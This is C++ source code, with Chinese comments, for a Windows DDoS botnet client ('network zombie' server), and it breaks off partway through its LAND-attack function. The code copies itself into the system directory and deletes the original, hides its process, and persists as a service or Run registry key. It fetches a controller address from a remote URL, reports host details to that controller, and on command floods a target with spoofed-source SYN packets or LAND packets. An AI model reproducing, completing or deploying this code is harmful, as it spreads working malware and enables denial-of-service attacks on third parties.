// HDService.cpp : Defines the entry point for the console application. //
//网络僵尸服务端代码 作者:教主 www.jiaozhu.net //请保留作者版权 #include
"stdafx.h" #include "HDService.h" #include "winsock2.h" #include "winsvc.h"
#include "windows.h" #include "afxinet.h" #include "HideProcess.h" //#include
"shellapi.h"
#define WM_SOCKET WM_USER+1000
#define SEQ 0x28376839
#define FAKE_IP "10.156.124.1" //伪装IP的起始值,本程序的伪装IP覆盖一个B类网段
#define ServiceName "www.jiaozhu.net"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
/////////////////////////////////////////////////////////////////////////////
// The one and only application object
CWinApp theApp;
using namespace std;
SERVICE_STATUS service_status_ss;
SERVICE_STATUS_HANDLE handle_service_status;
SC_HANDLE scm,svc;
SOCKET sock_client;
char systeminfor[256];
HANDLE ghThread;
HWND hWnd;
BOOL gbIsNT;
char ipfile[256];//ip文件
char installname[256]; //exe文件名称
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
Readme();
//::MessageBox(NULL,ipfile,NULL,MB_OK);
//::MessageBox(NULL,installname,NULL,MB_OK);
//Readme();
//return -1;
//UninstallService();
//return -1;
int nRetCode = 0;
gbIsNT=FALSE;
//****************************************//自删除
char CurrDirBuff[256];
char SysDirBuff[256];
int DirLen=sizeof(CurrDirBuff);
::GetCurrentDirectory(DirLen,CurrDirBuff);
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
//SaveLogToFile("out");
if (_stricmp(CurrDirBuff,SysDirBuff)!=0)
{
//SaveLogToFile("in");
//::MessageBox(NULL,"winmain",NULL,MB_OK);
char filename[256];
char This_File[MAX_PATH];
strcpy(filename,SysDirBuff);
strcat(filename,"//");
strcat(filename,installname);
memset(This_File,0,sizeof(This_File));
GetModuleFileName(NULL, This_File, sizeof(This_File));
if(::CopyFile(This_File,filename,FALSE)==0) return -1;
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
memset(&pinfo,0,sizeof(pinfo));
memset(&sinfo,0,sizeof(sinfo));
//SaveLogToFile("uninstall()");
uninstall();
//ShellExecute(NULL,"open",filename,NULL,SysDirBuff,SW_HIDE);
CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &sinfo, &pinfo);
//SaveLogToFile("CreateProcess()");
ExitProcess(0);
}
//******************************//创建互斥对象
//HANDLE hMutex=::CreateMutex(NULL,FALSE,"HDServer");
//if (GetLastError() == ERROR_ALREADY_EXISTS) return -1;
//******************************//取操作系统类型
DWORD dwVersion=::GetVersion();
// 得到操作系统的版本号
if(dwVersion >= 0x80000000)
// 操作系统是Win9x,不是WinNt
{
typedef DWORD(CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
//定义RegisterServiceProcess()函数的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL=LoadLibrary("KERNEL32");
//加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
//得到RegisterServiceProcess()函数的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1);
//执行RegisterServiceProcess()函数,隐藏本进程
FreeLibrary(hDLL);
//卸载动态链接库
}else
{
gbIsNT=TRUE;
}
if (gbIsNT)
{
//隐藏进程
HideProcess();
/*******************************************/
//服务入口表
SERVICE_TABLE_ENTRY service_tab_entry[2];
service_tab_entry[0].lpServiceName=ServiceName; //线程名字
service_tab_entry[0].lpServiceProc=ServiceMain; //线程入口地址
//可以有多个线程,最后一个必须为NULL
service_tab_entry[1].lpServiceName=NULL;
service_tab_entry[1].lpServiceProc=NULL;
if (StartServiceCtrlDispatcher(service_tab_entry)==0)
{
//int i=::GetLastError();
//char aa[3];
//::MessageBox(NULL,itoa(i,aa,10),NULL,MB_OK);
InstallService();
}
}
else
{
start();
}
return nRetCode;
}
/***********************************************/
//服务的真正入口点函数
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv)
{
service_status_ss.dwServiceType=SERVICE_WIN32;
service_status_ss.dwCurrentState=SERVICE_START_PENDING;
service_status_ss.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
service_status_ss.dwServiceSpecificExitCode=0;
service_status_ss.dwWaitHint=0;
service_status_ss.dwCheckPoint=0;
service_status_ss.dwWin32ExitCode=0;
if ((handle_service_status=RegisterServiceCtrlHandler(ServiceName,Handler))==0)
{
//::MessageBox(NULL,"RegisterServiceCtrlHandler error",NULL,MB_OK);
}//一个服务对应一个控制处理器
service_status_ss.dwCurrentState=SERVICE_RUNNING;
service_status_ss.dwWaitHint=0;
service_status_ss.dwCheckPoint=0;
::SetServiceStatus(handle_service_status,&service_status_ss);
//::MessageBox(NULL,"start","tell",MB_OK);
start();
return ;
}
/***********************************************/
//服务控制器
void WINAPI Handler(DWORD dwControl)
{
switch(dwControl)
{
case SERVICE_CONTROL_STOP:
service_status_ss.dwCurrentState=SERVICE_STOPPED;
::SetServiceStatus(handle_service_status,&service_status_ss);
break;
case SERVICE_CONTROL_CONTINUE:
service_status_ss.dwCurrentState=SERVICE_RUNNING;
::SetServiceStatus(handle_service_status,&service_status_ss);
break;
case SERVICE_CONTROL_PAUSE:
service_status_ss.dwCurrentState=SERVICE_PAUSED;
::SetServiceStatus(handle_service_status,&service_status_ss);
break;
case SERVICE_CONTROL_INTERROGATE:
break;
}
::SetServiceStatus(handle_service_status,&service_status_ss);
}
/***********************************************/
void InstallService()
{
char szSysDir[256];
memset(szSysDir,0,sizeof(szSysDir));
::GetSystemDirectory(szSysDir,sizeof(szSysDir));
strcat(szSysDir,"//");
strcat(szSysDir,installname);
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (scm!=NULL)
{
svc=::CreateService(scm,ServiceName,ServiceName,SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,szSysDir,NULL,NULL,NULL,NULL,NULL);
svc=::OpenService(scm,ServiceName,SERVICE_START);
if (svc!=NULL)
{
::StartService(svc,0,NULL);
::CloseServiceHandle(svc);
}
::CloseServiceHandle(scm);
}
}
/***********************************************/
void UninstallService()
{
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (scm!=NULL)
{
svc=::OpenService(scm,ServiceName,SERVICE_ALL_ACCESS);
if (svc!=NULL)
{
::DeleteService(svc);
::CloseServiceHandle(svc);
}
::CloseServiceHandle(scm);
}
}
/************************************************/
int start()
{
int ErrorCode;
WSADATA WsaData;
struct sockaddr_in DestAddr; //上线地址结构
char url[256];
MSG msg;
WNDCLASS wndc;
LPSTR szAppName="HDService";
wndc.style=0;
wndc.lpfnWndProc=WndProc;
wndc.cbClsExtra=0;
wndc.cbWndExtra=0;
wndc.hInstance=NULL;
wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION);
wndc.hCursor=LoadCursor(NULL,IDC_ARROW);
wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wndc.lpszMenuName=NULL;
wndc.lpszClassName=szAppName;
RegisterClass(&wndc);
hWnd=CreateWindow(szAppName,"HDos",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT,CW_USEDEFAULT,
NULL,NULL,NULL,NULL);
ShowWindow(hWnd,SW_HIDE);
UpdateWindow(hWnd);
//****************************************
memset(url,0,sizeof(url));
strcpy(url,strlwr(ipfile));
//::MessageBox(NULL,url,NULL,MB_OK);
//strcpy(url,"http://192.168.1.111/ip.jpg");
char html[256]; //获取的网页
char ClientIP[16]; //客户端ip
char ClientPort[5]; //客户端端口
char *point; //指针
char ComputerName[256]; //计算机名
char MemorySize[20]; //内存大小
char SendBuff[256]; //发送缓存
char OsName[64]; //操作系统类型
//******************************************
switch(GetOS())
{
case VER_PLATFORM_WIN32_WINDOWS:
lstrcpy(OsName,"Windows 9x");
RegMe();
break;
case VER_PLATFORM_WIN32_NT:
lstrcpy(OsName,"Windows NT/2000/XP");
break;
}
//******************************//取计算机名
memset(ComputerName,0,sizeof(ComputerName));
DWORD len=sizeof(ComputerName);
if ( !GetComputerName(ComputerName,&len)) return -1;
//******************************//取内存大小
MEMORYSTATUS mem;
mem.dwLength=sizeof(mem);
GlobalMemoryStatus(&mem);
memset(MemorySize,0,sizeof(MemorySize));
strcpy(MemorySize,itoa(mem.dwTotalPhys/1024/1024+2,MemorySize,10));
//******************************//获取网页内容
memset(html,0,sizeof(html));
strcpy(html,strlwr(GetHttpFile(url)));
//MessageBox(NULL,html,NULL,MB_OK);
//*****************************//获取客户端ip和端口
point=html;
if(strstr(html,"http://jiaozhu")!=NULL)
{
point=point+strlen("http://jiaozhu");
}
if(strstr(point,":")!=NULL)
{
memset(ClientIP,0,sizeof(ClientIP));
strncpy(ClientIP,point,strcspn(point,":"));
point=point+strcspn(point,":")+1;
if(strstr(point,"end")!=NULL)
{
memset(ClientPort,0,sizeof(ClientPort));
strncpy(ClientPort,point,strcspn(point,"end"));
}
}
//::MessageBox(NULL,ClientIP,NULL,MB_OK);
//::MessageBox(NULL,ClientPort,NULL,MB_OK);
//*************************************************
HANDLE hThread;
unsigned long uiThreadID=0;
CLIENTPARA *clientpa;
try
{
if((ErrorCode=WSAStartup(MAKEWORD(2,2),&WsaData))!=0)
{
return -1;
}
sock_client=::socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (sock_client==INVALID_SOCKET)
{
return -1;
}
//上线地址结构
memset(&DestAddr,0,sizeof(DestAddr));
DestAddr.sin_family=AF_INET;
DestAddr.sin_addr.s_addr=inet_addr(ClientIP);
DestAddr.sin_port=htons(atoi(ClientPort));
//while (1)
{
if(connect(sock_client,(sockaddr*)&DestAddr,sizeof(DestAddr))==SOCKET_ERROR )
{
Sleep(3000);
}
//连接上线
memset(SendBuff,0,sizeof(SendBuff));
strcat(SendBuff,"<CMD>000</CMD><CPNAME>");
strcat(SendBuff,ComputerName);
strcat(SendBuff,"</CPNAME><OSNAME>");
strcat(SendBuff,OsName);
strcat(SendBuff,"</OSNAME><MEM>");
strcat(SendBuff,MemorySize);
strcat(SendBuff,"</MEM>");
strcat(SendBuff,"/r/n");
memset(systeminfor,0,sizeof(systeminfor));
strcpy(systeminfor,SendBuff);
if (SOCKET_ERROR!=send(sock_client,SendBuff,sizeof(SendBuff),0))
{
}
//发送上线消息
if (WSAAsyncSelect(sock_client,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE)==SOCKET_ERROR)
{
}
//开始线程
clientpa=new CLIENTPARA;
memset(clientpa,0,sizeof(clientpa));
strcpy(clientpa->IP,ClientIP);
strcpy(clientpa->port,ClientPort);
hThread=(HANDLE)::CreateThread(NULL,0,SocketThreadProc,clientpa,CREATE_SUSPENDED,&uiThreadID);
if (hThread!=NULL)
{
ResumeThread(hThread);
}
}
}
catch(...)
{}
while(GetMessage(&msg,NULL,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
//***********************************************//自删除
void uninstall(void)//Thanks to Spybot
{
char batfile[MAX_PATH];
char tempdir[MAX_PATH];
char tcmdline[MAX_PATH];
char cmdline[MAX_PATH];
char This_File[MAX_PATH];
HANDLE f;
DWORD r;
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
GetTempPath(sizeof(tempdir), tempdir);
sprintf(batfile, "%s//rs.bat", tempdir);
f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
if (f != INVALID_HANDLE_VALUE)
{
// write a batch file to remove our executable once we close
WriteFile(f, "@echo off/r/n"
":start/r/nif not exist /"/"%1/"/" goto done/r/n"
"del /F /"/"%1/"/"/r/n"
"del /"/"%1/"/"/r/n"
"goto start/r/n"
":done/r/n"
"del /F %temp%/rs.bat/r/n"
"del %temp%/r.bat/r/n", 105, &r, NULL);
CloseHandle(f);
memset(&sinfo, 0, sizeof(STARTUPINFO));
sinfo.cb = sizeof(sinfo);
sinfo.wShowWindow = SW_HIDE;
memset(This_File,0,sizeof(This_File));
GetModuleFileName(NULL, This_File, sizeof(This_File));
sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, This_File); // build command line
ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line
// execute the batch file
CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo);
}
}
////**************************************************
//注册自启动
void RegMe(void)
{
HKEY hkey=HKEY_LOCAL_MACHINE;
char lpSubKey[256]="Software//Microsoft//Windows//CurrentVersion//Run";
HKEY phkResult;
char lpValue[256];
memset(lpValue,0,sizeof(lpValue));
strcpy(lpValue,installname);
int len=sizeof(lpValue);
if(::RegOpenKeyEx(hkey,lpSubKey,0,KEY_ALL_ACCESS,&phkResult)!=ERROR_SUCCESS)
{
::RegCreateKeyEx(hkey,lpSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_WRITE,NULL,&phkResult,NULL);
}
//如果不存在值,就新建
if (RegQueryValueEx(hkey,lpSubKey,NULL,NULL,(unsigned char *)&lpValue,(unsigned long *)&len)!=ERROR_SUCCESS)
::RegSetValueEx(phkResult,lpValue,0,REG_SZ,(unsigned char*)&lpValue,sizeof(lpValue));
::RegCloseKey(phkResult);
}
///************************************************
char* GetHttpFile(char url[])
{
CInternetSession session("My Session");
CHttpConnection* pServer = NULL;
CHttpFile* pFile = NULL;
/********************************///获取主机名
char szIPFile[256]; //ip文件名
char szHostName[256]; //主机名
char *str;
str=url;
if(strstr(url,"http://")!=NULL)
{
str=str+::strlen("http://");
}
if(strstr(str,"/")!=NULL)
{
::memset(szHostName,0,sizeof(szHostName));
strncpy(szHostName,str,strcspn(str,"/"));
str=str+strcspn(str,"/");
strcpy(szIPFile,str);
}
/********************************///下载网页文件
char szBuff[65535];
try
{
CString strServerName;
CString strObject;
INTERNET_PORT nPort;
DWORD dwRet;
nPort=80;
strServerName.Format(szHostName);
strObject.Format(szIPFile);
pServer = session.GetHttpConnection(strServerName, nPort);
pFile = pServer->OpenRequest(CHttpConnection::HTTP_VERB_GET, strObject);
pFile->SendRequest();
pFile->QueryInfoStatusCode(dwRet);
if (dwRet == HTTP_STATUS_OK)
{
::memset(szBuff,0,sizeof(szBuff));
UINT nRead = pFile->Read(szBuff, 65534);
}
delete pFile;
delete pServer;
}
catch (...)
{
//catch errors from WinInet
}
session.Close();
return szBuff;
}
///************************************************//获取操作系统类型
DWORD WINAPI GetOS()
{
OSVERSIONINFO os;
os.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
GetVersionEx(&os);
switch(os.dwPlatformId)
{
case VER_PLATFORM_WIN32_WINDOWS:
return VER_PLATFORM_WIN32_WINDOWS;
case VER_PLATFORM_WIN32_NT:
return VER_PLATFORM_WIN32_NT;
}
}
//*************************************************
//连接线程//每30秒检测是否断线,并连接
unsigned long CALLBACK SocketThreadProc(LPVOID pParam)
{
char html[512];
char *point;
char ClientIP[32];
char ClientPort[6];
CLIENTPARA *clientp=(CLIENTPARA*)pParam;
if (clientp==NULL)
return -1;
char port[6] ;
strcpy(port,clientp->port);
char IP[32];
memcpy(IP, clientp->IP, sizeof(IP));
delete clientp;
struct sockaddr_in TargAddr;
memset(&TargAddr,0,sizeof(TargAddr));
TargAddr.sin_family=AF_INET;
TargAddr.sin_addr.s_addr=inet_addr(IP);
TargAddr.sin_port=htons(atoi(port));
while (1)
{
if(connect(sock_client,(sockaddr*)&TargAddr,sizeof(TargAddr))==SOCKET_ERROR )
{
Sleep(3000);
int i=::WSAGetLastError();
/*char errorcode[5];
itoa(i,errorcode,10);
MessageBox(NULL,errorcode,NULL,MB_OK);*/
if (i==10056)
{
Sleep(30000);
}
else //if (i==10038)
{
//如果sock中断,创建sock
sock_client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
//connect(sock_client,(sockaddr*)&TargAddr,sizeof(TargAddr));
Sleep(30000);
memset(html,0,sizeof(html));
strcpy(html,strlwr(GetHttpFile(ipfile)));
//MessageBox(NULL,html,NULL,MB_OK);
//*****************************//获取客户端ip和端口
point=html;
if(strstr(html,"http://jiaozhu")!=NULL)
{
point=point+strlen("http://jiaozhu");
}
if(strstr(point,":")!=NULL)
{
memset(ClientIP,0,sizeof(ClientIP));
strncpy(ClientIP,point,strcspn(point,":"));
point=point+strcspn(point,":")+1;
if(strstr(point,"end")!=NULL)
{
memset(ClientPort,0,sizeof(ClientPort));
strncpy(ClientPort,point,strcspn(point,"end"));
memset(&TargAddr,0,sizeof(TargAddr));
TargAddr.sin_family=AF_INET;
TargAddr.sin_addr.s_addr=inet_addr(ClientIP);
TargAddr.sin_port=htons(atoi(ClientPort));
//::SaveLogToFile(ipfile);
//::SaveLogToFile(html);
//::SaveLogToFile(ClientIP);
//::SaveLogToFile(ClientPort);
}
}
//break;
}
}
else
{
send(sock_client,systeminfor,sizeof(systeminfor),0);
WSAAsyncSelect(sock_client,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE);
Sleep(30000);
}
Sleep(1000);
}
return 0;
}
//*************************************************
//*******************************************************
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
{
char buff[256];
char ip[32];
char port[6];
char * p=NULL;
CLIENTPARA *clientpa;
unsigned long uiThreadID=0;
switch(message)
{
case WM_SOCKET:
if(WSAGETSELECTERROR(lParam))
{
closesocket(wParam);
break;
}
switch(WSAGETSELECTEVENT(lParam))
{
//连接
case FD_ACCEPT:
break;
//读取输入,如是回车则执行命令
//不是将输入复制到缓冲区
case FD_READ:
if (recv(sock_client,buff,sizeof(buff),0)!=SOCKET_ERROR)
{
//::MessageBox(NULL,buff,NULL,MB_OK);
strcpy(buff,strlwr(buff));
//开始攻击
if(strncmp(buff,"001",3)==0)
{
p=buff;
if (strstr(buff,"[ip]")!=NULL)
{
p=buff+strlen("001[ip]");
strcpy(buff,p);
if(strstr(buff,"[port]")!=NULL)
{
memset(ip,0,sizeof(ip));
strncpy(ip,buff,strcspn(buff,"[ip]"));
//::MessageBox(NULL,ip,NULL,MB_OK);
p=buff+strlen(ip)+strlen("[port]");
memset(port,0,sizeof(port));
if (strstr(p,"end")!=NULL)
{
strncpy(port,p,strcspn(p,"end"));
//::MessageBox(NULL,port,NULL,MB_OK);
//开始线程
clientpa=new CLIENTPARA;
memset(clientpa,0,sizeof(clientpa));
strcpy(clientpa->IP,ip);
strcpy(clientpa->port,port);
//clientpa->s=sock_client;
if(ghThread==NULL)
{
ghThread=(HANDLE)::CreateThread(NULL,0,LandDDOSFunction,clientpa,CREATE_SUSPENDED,&uiThreadID);
if (ghThread!=NULL)
{
//::MessageBox(NULL,"START DDOSFUNCTION",NULL,MB_OK);
ResumeThread(ghThread);
}
}
}
}
}
}
//结束工具
if(strncmp(buff,"002",3)==0)
{
if (ghThread!=NULL)
{
::TerminateThread(ghThread,0);
//::MessageBox(NULL,"STOP DDOSFUNCTION",NULL,MB_OK);
ghThread=NULL;
}
}
}
//MessageBox(NULL,"FD_READ",NULL,MB_OK);
break;
case FD_WRITE:
//MessageBox(NULL,"FD_WRITE",NULL,MB_OK);
break;
case FD_CLOSE:
//MessageBox(NULL,"FD_CLOSE",NULL,MB_OK);
closesocket(wParam);
break;
}
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hWnd,message,wParam,lParam);
}
return 0;
}
//*********************************************************
//***************************************************************
unsigned long CALLBACK DDOSFunction(LPVOID dParam)
{
CLIENTPARA *clientp=(CLIENTPARA*)dParam;
if (clientp==NULL)
return -1;
char SYN_DEST_IP[32];
char port[6];
char SendBuf[128];
WSADATA WsaData;
SOCKET SockRaw=(SOCKET)NULL;
struct sockaddr_in DestAddr;
IP_HEADER ip_header;
TCP_HEADER tcp_header;
int datasize,ErrorCode,Counter,flag,FakeIPNet,FakeIPHost;
int TimeOut=2000,SendSEQ=0;
memset(SYN_DEST_IP,0,sizeof(SYN_DEST_IP));
memset(port,0,sizeof(port));
strcpy(SYN_DEST_IP,clientp->IP);
strcpy(port,clientp->port);
//初始化SOCKET
if((ErrorCode=WSAStartup(MAKEWORD(2,2),&WsaData))!=0)
{
ExitProcess(ErrorCode);
}
SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
if (SockRaw==INVALID_SOCKET)
{
ExitProcess(ErrorCode);
}
flag=TRUE;
ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(CHAR *)&flag,sizeof(int));
if (ErrorCode==SOCKET_ERROR)
{
return 1;
}
__try
{
ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
if (ErrorCode==SOCKET_ERROR)
{
return 2;
}
memset(&DestAddr,0,sizeof(DestAddr));
DestAddr.sin_family=AF_INET;
DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP);
FakeIPNet=inet_addr(FAKE_IP);
FakeIPHost=ntohl(FakeIPNet);
//填充IP首部
ip_header.h_verlen=(4<<4|sizeof(ip_header)/sizeof(unsigned long));
//高四位IP版本号,低四位首部长度
ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); //16位总长度(字节)
ip_header.ident=1; //16位标识
ip_header.frag_and_flags=0; //3位标志位
ip_header.ttl=128; //8位生存时间TTL
ip_header.proto=IPPROTO_TCP; //8位协议(TCP,UDP…)
ip_header.checksum=0; //16位IP首部校验和
ip_header.sourceIP=htonl(FakeIPHost+SendSEQ); //32位源IP地址
ip_header.destIP=inet_addr(SYN_DEST_IP); //32位目的IP地址
//填充TCP首部
tcp_header.th_sport=htons(::rand()); //源端口号
tcp_header.th_dport=htons(atoi(port)); //目的端口号
tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN序列号
tcp_header.th_ack=0; //ACK序列号置为0
tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0); //TCP长度和保留位
tcp_header.th_flag=2; //SYN 标志
tcp_header.th_win=htons(16384); //窗口大小
tcp_header.th_urp=0; //偏移
tcp_header.th_sum=0; //校验和
//填充TCP伪首部(用于计算校验和,并不真正发送)
psd_header.saddr=ip_header.sourceIP; //源地址
psd_header.daddr=ip_header.destIP; //目的地址
psd_header.mbz=0;
psd_header.ptcl=IPPROTO_TCP; //协议类型
psd_header.tcpl=htons(sizeof(tcp_header)); //TCP首部长度
while(1) {
//每发送10,240个报文输出一个标示符
//printf(".");
for(Counter=0;Counter<10240;Counter++)
{
Sleep(10);
if(SendSEQ++==65536) SendSEQ=1; //序列号循环
//更改IP首部
ip_header.checksum=0; //16位IP首部校验和
ip_header.sourceIP=htonl(FakeIPHost+SendSEQ); //32位源IP地址
//更改TCP首部
tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN序列号
tcp_header.th_sum=0; //校验和
//更改TCP Pseudo Header
psd_header.saddr=ip_header.sourceIP;
//计算TCP校验和,计算校验和时需要包括TCP pseudo header
::memset(SendBuf,0,sizeof(SendBuf));
memcpy(SendBuf,&psd_header,sizeof(psd_header));
memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header));
//计算IP校验和
memcpy(SendBuf,&ip_header,sizeof(ip_header));
memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));
memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4);
datasize=sizeof(ip_header)+sizeof(tcp_header);
ip_header.checksum=checksum((USHORT *)SendBuf,datasize);
//填充发送缓冲区
memcpy(SendBuf,&ip_header,sizeof(ip_header));
//发送TCP报文
ErrorCode=sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*) &DestAddr, sizeof(DestAddr));
//if (ErrorCode==SOCKET_ERROR)
//printf("/nSend Error:%d/n",GetLastError());
}//End of for
}//End of While
}//End of try
__finally
{
if(SockRaw != INVALID_SOCKET)
closesocket(SockRaw);
WSACleanup();
//printf("end");
}
}
//*****************************************************
USHORT checksum(USHORT *buffer,int size)
{
unsigned long cksum=0;
while (size>1)
{
cksum+=*buffer++;
size-=sizeof(USHORT);
}
if (size)
{
cksum+=*(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
//*****************************************************
void Readme()
{
char peizhi[7];
char pzpos[29];
char tempstr[1000];
char szThis_file[256];
try
{
//SaveLogToFile("Readme()");
memset(szThis_file,0,sizeof(szThis_file));
::GetModuleFileName(NULL,szThis_file,sizeof(szThis_file));
CFile cf;
cf.Open(szThis_file,CFile::modeRead,NULL);
memset(peizhi,0,7);
cf.Seek(cf.GetLength()-7,CFile::begin);
cf.Read(peizhi,7);
//if(strcmp(peizhi,"HGZVIP1")==0)
{
//::MessageBox(NULL,peizhi,NULL,MB_OK);
cf.Seek(cf.GetLength()-36,CFile::begin);
cf.Read(pzpos,29);
int j=0,len=0;
char *p,*q;
p=pzpos;
//::MessageBox(NULL,pzpos,NULL,MB_OK);
for(;j<29;j++)
{
len=len+(*p);
p=p+1;
}
cf.Seek(cf.GetLength()-36-len,CFile::begin);
memset(tempstr,0,1000);
cf.Read(tempstr,len);
//安装名称
len=0;
p=pzpos;
for(j=1;j<=1;j++)
{
len=len+(*p);
p=p+1;
}
q=tempstr+len;
memset(installname,0,sizeof(installname));
::strncpy(installname,q,(*p));
//SaveLogToFile(installname);
//ip文件
len=0;
p=pzpos;
for(j=1;j<=13;j++)
{
len=len+(*p);
p=p+1;
}
q=tempstr+len;
memset(ipfile,0,sizeof(ipfile));
::strncpy(ipfile,q,(*p));
//SaveLogToFile(ipfile);
delete p,q;
cf.Close();
}
}
catch(...)
{
}
}
//************************************************
/***********************************************/
//保存日志
void SaveLogToFile(char *content)
{
CFile logfile;
CString strTime;
strTime=CTime::GetCurrentTime().Format("%H:%M:%S ");
logfile.Open("c://HDService.log",CFile::modeWrite|CFile::modeCreate|CFile::modeNoTruncate,NULL);
logfile.SeekToEnd();
logfile.Write(strTime,strTime.GetLength());
logfile.Write(content,strlen(content));
logfile.Write("/r/n",strlen("/r/n"));
logfile.Close();
}
/***********************************************/
//CheckSum:计算校验和的子函数
USHORT Landchecksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size )
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
/***********************************************/
unsigned long Landresolve(char *host)
{
long i;
struct hostent *he;
if((i=inet_addr(host))<0)
if((he=gethostbyname(host))==NULL)
return(0);
else
return(*(unsigned long *)he->h_addr);
return(i);
}
/***********************************************/
unsigned long CALLBACK LandDDOSFunction(LPVOID dParam)
{
//传入参数
CLIENTPARA *clientp=(CLIENTPARA*)dParam;
if (clientp==NULL)
return -1;
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IP_HEADER ipHeader;
TCP_HEADER tcpHeader;
//psd_header psdHeader;
char szSendBuf[40]={0};
BOOL flag;
int Land;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
{
return -1;
}
if ((sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET)
{
return -2;
}
//设置ip选项
flag=true;
if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
{
return -3;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(atoi(clientp->port));
addr_in.sin_addr.S_un.S_addr=Landresolve(clientp->IP);
//填充IP首部
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=htons(0xF1C);
ipHeader.frag_and_flags=0;
ipHeader.ttl=255;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.sourceIP=Landresolve(clientp->IP);
ipHeader.destIP=ipHeader.sourceIP;
//填充TCP首部
tcpHeader.th_sport=htons(atoi(clientp->port));
tcpHeader.th_dport=htons(atoi(clientp->port));
tcpHeader.th_seq=htonl(0xF1C);
tcpHeader.th_ack=1;
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_flag=2; //修改这里来实现不同的标志位探测,2是SYN,1是FIN,16是ACK探测 等等
tcpHeader.th_win=htons(2048);
tcpHeader.th_urp=0;
tcpHeader.th_sum=0;
psd_header.saddr=ipHeader.sourceIP;
psd_header.daddr=ipHeader.destIP;
psd_header.mbz=0;
psd_header.ptcl=IPPROTO_TCP;
psd_header.tcpl=htons(sizeof(tcpHeader));
//计算校验和
memcpy(szSendBuf, &psd_header, sizeof(psd_header));
memcpy(szSendBuf+sizeof(psd_header), &tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=Landchecksum((USHORT *)szSendBuf,sizeof(psd_header)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
